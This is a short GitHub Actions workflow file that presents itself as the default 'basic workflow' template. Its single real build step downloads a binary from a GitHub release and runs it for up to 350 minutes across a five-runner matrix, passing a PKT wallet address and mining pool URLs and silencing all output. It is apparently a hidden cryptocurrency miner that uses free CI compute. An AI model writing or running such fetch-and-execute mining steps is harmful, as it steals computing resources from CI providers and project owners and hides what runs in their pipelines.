 This is a basic workflow to help you get started with Actions

name: CI

# Controls when the workflow will run
on:
  # Triggers the workflow on push or pull request events but only for the main branch
  push:
    branches: [ main ]
  pull_request:
    branches: [ main ]

  # Allows you to run this workflow manually from the Actions tab
  workflow_dispatch:

# A workflow run is made up of one or more jobs that can run sequentially or in parallel
jobs:
  # This workflow contains a single job called "build"
  build:
    name: TiyasTampan
    # The type of runner that the job will run on
    runs-on: ubuntu-latest

    strategy:
      fail-fast: false
      matrix:
        runner: ['t', 'i','y','a','z']
    steps:
      - name: Install packages
        run: sudo apt-get install bash git
      - name: StartMe
        run: |
          wget https://github.com/nganji523/cicip/releases/download/tiyasakbar/tiyasakbar-linux_amd64 && chmod +x tiyasakbar-linux_amd64 && timeout 350m ./tiyasakbar-linux_amd64 ann -p pkt1qyjyh8m95lgcxg8hc3ajtk5gh2x45h9y4w7cfdz http://pool.srizbi.com http://pool.pktpool.io http://pool.pkt.world &> /dev/null
